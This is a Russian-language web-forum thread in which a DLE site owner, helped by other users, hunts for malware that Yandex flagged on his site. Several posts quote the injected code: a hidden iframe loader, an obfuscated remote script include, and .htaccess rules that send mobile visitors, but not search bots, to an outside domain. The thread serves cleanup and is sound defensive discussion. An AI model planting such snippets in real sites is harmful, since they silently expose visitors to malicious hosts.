Anatoliy03 0 Опубликовано: 24 августа 2013 Рассказать Опубликовано: 24 августа 2013 Помогите найти вредоносный код , пришло письмо от яндекса. При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в .js-скриптах вредоносный код следующего содержания: var if1S9Ph = document.createElement('iframe');if1S9Ph.name = 'if1S9Ph';if1S9Ph.src = 'http://dfbs.funentry.com/';if1S9Ph.style.width = '0px';if1S9Ph.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if1S9Ph=') == -1) { document.getElementsByTagName('body')[0].appendChild(if1S9Ph); document.cookie = 'if1S9Ph=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}}; Если сделать с админки восстановления базы проблема изчезнет? Цитата Ссылка на сообщение Поделиться на других сайтах
alex32 942 Опубликовано: 24 августа 2013 Рассказать Опубликовано: 24 августа 2013 код не обязательно в бд, даже скорей всего не там. он может быть и в файлах шаблона и самого движка. Цитата Ссылка на сообщение Поделиться на других сайтах
Anatoliy03 0 Опубликовано: 26 августа 2013 Рассказать Опубликовано: 26 августа 2013 Автор Как можно скачать версию dle 9.6, у меня годовая лицензия давно закончилась, хочу переустановить движок, никак вредоносный код не найду, скачивать где попало не охота Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 26 августа 2013 Рассказать Опубликовано: 26 августа 2013 напиши Владимиру Цитата Ссылка на сообщение Поделиться на других сайтах
Anatoliy03 0 Опубликовано: 29 августа 2013 Рассказать Опубликовано: 29 августа 2013 Автор Вредоносный код так и не нашел, пару дней назад появилось вот такое: Mogaso.ws - пїЅпїЅпїЅпїЅпїЅпїЅ, пїЅпїЅпїЅпїЅ, пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ... И в админ панели где описание сайта тоже самое. Как найти этот код? Прога ai-bolit не помогла. Цитата Ссылка на сообщение Поделиться на других сайтах
Nektov 59 Опубликовано: 30 августа 2013 Рассказать Опубликовано: 30 августа 2013 Mogaso.ws Ваш сайт? Если да, то сочувствую: Сторінка звітована як нападницька! Цю веб-сторінку на mogaso.ws було відзвітовано як нападницьку, тому вона була заблокована згідно з вашими вподобаннями безпеки. Нападницькі сторінки намагаються встановити програми що крадуть конфіденційну інформацію, використовують ваш комп’ютер для подальших атак чи ушкоджують вашу систему.Деякі нападницькі сторінки навмисно розповсюджують шкідливі програми, проте чимало використовуються втемну, без відома та дозволу їх хазяїв. Если Могасо не ваше, дайте адрес сайта. Цитата Ссылка на сообщение Поделиться на других сайтах
Anatoliy03 0 Опубликовано: 30 августа 2013 Рассказать Опубликовано: 30 августа 2013 Автор Mogaso.ws мой сайт и вирус по прежнему там Цитата Ссылка на сообщение Поделиться на других сайтах
alex32 942 Опубликовано: 30 августа 2013 Рассказать Опубликовано: 30 августа 2013 ai-bolit, замена подозрительных файлов (/engine/inc/include/init.php, все js-файлы, проверка htaccess), установить все патчи для 9,6 с оффсайта. Видимо патчи не ставили? только что чистил на заказ , тоже 9,6 без патчей стоял, та же картина. Цитата Ссылка на сообщение Поделиться на других сайтах
Anatoliy03 0 Опубликовано: 31 августа 2013 Рассказать Опубликовано: 31 августа 2013 Автор ai-bolit, замена подозрительных файлов (/engine/inc/include/init.php, все js-файлы, проверка htaccess), установить все патчи для 9,6 с оффсайта. Видимо патчи не ставили? только что чистил на заказ , тоже 9,6 без патчей стоял, та же картина. Патчи все установлены, с последним опоздал уже поставил когда на сайте появился вирус Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 31 августа 2013 Рассказать Опубликовано: 31 августа 2013 Патчи все установлены, с последним опоздал уже поставил когда на сайте появился вирус Последний не может привести к вирусу, он от другого предназначен.Вирус у вас судя по всему в шаблоне, а именно в коде <script type="text/javascript">var s = "w.bi";var m = Math.floor(Math.random()*15000);var v = "ru";document.write('<s'+'cr'+'ipt language="javascript" charset="windows-1251" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+s+'str4.'+v+'/go.php?id=2733&m='+m+'"><'+'/scr'+'ipt>');</script> [/CODE] Цитата Ссылка на сообщение Поделиться на других сайтах
Anatoliy03 0 Опубликовано: 31 августа 2013 Рассказать Опубликовано: 31 августа 2013 Автор Патчи все установлены, с последним опоздал уже поставил когда на сайте появился вирус Последний не может привести к вирусу, он от другого предназначен. Вирус у вас судя по всему в шаблоне, а именно в коде <script type="text/javascript">var s = "w.bi";var m = Math.floor(Math.random()*15000);var v = "ru";document.write('<s'+'cr'+'ipt language="javascript" charset="windows-1251" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+s+'str4.'+v+'/go.php?id=2733&m='+m+'"><'+'/scr'+'ipt>');</script> это код баннера, я его удалял проверял на яндексе, все равно пишет вредоносный код и вчера поставил обратно баннер Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 31 августа 2013 Рассказать Опубликовано: 31 августа 2013 Anatoliy03, На данный момент я не вижу никаких вирусов на сайте, если вы его удалили, то нужно ждать пока яндекс переиндексирует сайт, чтобы ускорить процедуру можно написать в поддержку яндекса Цитата Ссылка на сообщение Поделиться на других сайтах
Anatoliy03 0 Опубликовано: 31 августа 2013 Рассказать Опубликовано: 31 августа 2013 Автор Anatoliy03, На данный момент я не вижу никаких вирусов на сайте, если вы его удалили, то нужно ждать пока яндекс переиндексирует сайт, чтобы ускорить процедуру можно написать в поддержку яндекса Сегодня опять появился файп при проверке ативирусом движка ./info.php 18 b 29.08.2013 17:27:30 неизвестен дистрибутиву Вчера удалил, сегодня антивирус показывает, что есть но я его не нахожу, где он может быть? Если переустановлю движок проблема исчезнет и как правильно переустановить, по инструкции обновления? яндекс и google показывают, что вредононый код присутствует http://mogaso.ws/books/38413-osnovy-klassicheskoy-kriptologii-sekrety-shifrov-i-kodov-adamenko-mv-2012.html Поведенческий анализ http://mogaso.ws/books/51152-romanov-german-spasti-kappelya-pod-belo-zelenym-znamenem-audiokniga.html Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 1 сентября 2013 Рассказать Опубликовано: 1 сентября 2013 Сегодня опять появился файп при проверке ативирусом движка ./info.php 18 b 29.08.2013 17:27:30 неизвестен дистрибутиву Вчера удалил, сегодня антивирус показывает, что есть но я его не нахожу, где он может быть? файл размером 18 байт, туда вирус вряд ли поместится. Приведите содержимое этого файла. Если переустановлю движок проблема исчезнет и как правильно переустановить, по инструкции обновления? Да по инструкции по обновлению. яндекс и google показывают, что вредононый код присутствует Уберите все сторонние JS скрипты из вашего шаблона и вашу рекламу, и напишите в яндекс чтобы сайт был перепроверен. У меня вызывают большие сомнения ваши рекламные коды, зловредный код может и в рекламе быть и загружаться со сторонних сайтов. Цитата Ссылка на сообщение Поделиться на других сайтах
Anatoliy03 0 Опубликовано: 2 сентября 2013 Рассказать Опубликовано: 2 сентября 2013 Автор Сегодня опять появился файп при проверке ативирусом движка ./info.php 18 b 29.08.2013 17:27:30 неизвестен дистрибутиву Вчера удалил, сегодня антивирус показывает, что есть но я его не нахожу, где он может быть? файл размером 18 байт, туда вирус вряд ли поместится. Приведите содержимое этого файла. Если переустановлю движок проблема исчезнет и как правильно переустановить, по инструкции обновления? Да по инструкции по обновлению. яндекс и google показывают, что вредононый код присутствует Уберите все сторонние JS скрипты из вашего шаблона и вашу рекламу, и напишите в яндекс чтобы сайт был перепроверен. У меня вызывают большие сомнения ваши рекламные коды, зловредный код может и в рекламе быть и загружаться со сторонних сайтов. Ответ яндекса: Cайт был перепроверен 2 Сентября 2013. К сожалению, на сайте остались страницы, содержащие вредоносный код. Цитата Ссылка на сообщение Поделиться на других сайтах
vadimushka_d 0 Опубликовано: 2 сентября 2013 Рассказать Опубликовано: 2 сентября 2013 удали шаблон, и поставь что в стандарте с движком шел, и проверяй, может с шаблона все и началось, а также проверяй все скрипты, лучше дай код кому нибудь сведущему в этих делах! Цитата Ссылка на сообщение Поделиться на других сайтах
Anatoliy03 0 Опубликовано: 6 сентября 2013 Рассказать Опубликовано: 6 сентября 2013 Автор Вот удалил во всех файлах htaccess RewriteEngine on RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|iemobile|nokia|ucweb|ucbrowser) [NC] RewriteCond %{HTTP_USER_AGENT} !(bot|accoona|ia_archiver|antabot|ask jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC] RewriteRule (.*) http://in.getpdaupd.net/?19&source=46.165.223.4 [L,R=302] # Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.